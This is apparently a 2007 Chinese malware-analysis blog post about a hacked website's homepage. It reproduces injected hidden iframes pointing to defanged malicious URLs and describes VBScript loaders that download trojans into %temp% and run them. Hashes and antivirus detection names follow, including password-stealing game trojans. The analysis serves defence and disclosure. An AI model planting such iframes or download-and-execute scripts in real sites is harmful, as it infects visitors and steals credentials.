endurer 原创
2007-02-12 第1版
该网站首页首部被加入代码:
/--------
<iframe src=hxxp://g***m**06.z**kd**520.cn/k**k*k/wm.htm width=0 height=0></iframe>
<iframe src=hxxp://www.y*x***gm***7*8.com/mh/mh.htm width=0 height=0></iframe>
<iframe src=hxxp://www.y*x***gm***7*8.com/mh/wow.htm width=0 height=0></iframe>
<iframe src=hxxp://www.2***s*s**s*s.com/qq/pop.htm width=0 height=0></iframe>
--------/
中部被加入代码:
/--------
<iframe src=hxxp://ll78.com/qq/2.asp width=0 height=0></iframe>
<iframe src="hxxp://ll78.com/index1.asp" width=0 height=0></iframe>
<iframe src="hxxp://ll78.com/xiao.htm" width=0 height=0></iframe>
--------/
1、hxxp://g***m**06.z**kd**520.cn/kkk/wm.htm
包含有使用escape()加密的VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件1.exe,保存为 %temp%/asde.exe,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行 。
/--------
文件说明符 : d:/test/1.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-11 22:45:52
修改时间 : 2007-2-11 22:45:54
访问时间 : 2007-2-11 0:0:0
大小 : 59121 字节 57.753 KB
MD5 : 42488f09828498af6c511bc1df294791
--------/
Kaspersky报为:Backdoor.Win32.Agent.aex
2、hxxp://www.y*x***gm***7*8.com/mh/mh.htm
包含VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件mh.exe,保存为 %temp%/IE601.com,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
/--------
文件说明符 : d:/test/mh.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-11 22:50:30
修改时间 : 2007-2-11 22:50:32
访问时间 : 2007-2-11 0:0:0
大小 : 20480 字节 20.0 KB
MD5 : 249bbfd18001ff78d14e0b8d7bfb4596
--------/
采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 加壳
Kaspersky报为:Trojan-PSW.Win32.OnLineGames.fb
Scanned file: mh.exe - Infected
|
mh.exe - infected by Trojan-PSW.Win32.OnLineGames.fb
Statistics:
Known viruses: |
266800 |
Updated: |
11-02-2007 |
File size (Kb): |
20 |
Virus bodies: |
1 |
Files: |
1 |
Warnings: |
0 |
Archives: |
0 |
Suspicious: |
0 |
|
瑞星报为:
Trojan.PSW.JHOnline.fcd
3、hxxp://www.y*x***gm***7*8.com/mh/wow.htm
包含VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件wow.exe,保存为 %temp%/IE603.com,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
/--------
文件说明符 : d:/test/wow.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-11 22:50:47
修改时间 : 2007-2-11 22:50:48
访问时间 : 2007-2-11 0:0:0
大小 : 45056 字节 44.0 KB
MD5 : f6d6c2e4bb78416e9e74638be1fc4a8d
--------/
采用BERO加壳
Kaspersky报为:Trojan.Win32.Agent.abf
Dr.Web报为:Trojan.Havedo
hxxp://www.2***s*s**s*s.com/qq/pop.htm
hxxp://l*l***7*8.com/qq/2.asp
hxxp://l*l***7*8.com/index1.asp
hxxp://l*l***7*8.com/xiao.htm
均无法找到该页
分享到:
相关推荐
江西长运:江西长运2020年年度报告.PDF
江西长运:江西长运招股说明书.PDF
江西长运2021年二季度财务分析报告.docx
江西长运2021年二季度财务分析报告.pdf
江西长运:江西长运2021年半年度报告全文.rar
江西长运:江西长运2021年半年度报告全文.PDF
长运股份:2019半年度报告.PDF
江西长运:2019年半年度报告.PDF
某长运仓储及交通设施项目新建冷库制冷系统设备采购.doc
江西长运:2019年年度报告.PDF
长运公司保持先进性的具体要求学习体会 .docx
档案袋伴我学-若博(着)康长运(译)-中文-图书资讯-2012.5.23
指出了试生产期间的主要运行指标与理论动态分析的主要差异,同时,针对设计中存在的主要技术问题,提出长运距带式输送机宜在回程带面加设输送带翻转装置,长运距大型带式输送机宜在头部驱动滚筒加设逆止器等解决方案。...
针对黄陵煤矿的地质和环境条件,介绍了3 000 m长运距可伸缩带式输送机的设计方案,详细介绍了该带式输送机主要结构的改进措施。实际应用结果表明,该长运距可伸缩带式输送机运行稳定可靠,效果良好。
针对综采工作面运输巷长运距、巷道弯曲等复杂地质条件下,需要安装多台带式输送机才能完成运输任务的情况,提出了通过使用高强度整芯输送带、选用自控液压张紧系统和变频控制等技术解决长运距运输的方案,同时根据现场...
为了对其性能进行验证,在山西某煤矿进行了运行工业性试验,结果表明,相比于传统带式输送机自移式机尾,性能更可靠,具有更强的适应性和可操作性。另外,针对综掘工作面各种管线的吊挂及移动不便等问题,自行设计了新型...
5)参观故障诊断实验室、调研长运电子市场、请教学长、查阅测控论坛及相关网站 ,了解电子类、测控类相关知识,并写一份调研报告; 6)针对某一常见的测控问题(如下),设计具体电路,要求实验室调试。 3、课程...
SM2212EK两段调光恒流电源IC是一款可 2 段调节亮度/色温的 LED 线性恒流控制芯片。适用于 200Vac~240Vac 或 110Vac~130Vac 输入电压。当SM2212EK 在2 段调节亮度应用中,可根据开启关闭电源开关, 依次改变输出电流...
随着中国联通3G(WCDMA)业务的开通,无线监控已经逐步从早期的基于控制命令和图片等小数据量的应用,向可以基于实时的海量数据的实时监控应用发展。而目前最为引人注目的无疑是联网的实时视频监控。
通过大同煤矿集团公司在同忻煤矿首采工作面顺槽首次应用长运距大功率多驱动可伸缩带式输送机的实例,阐述了其研制及应用的意义和发展方向。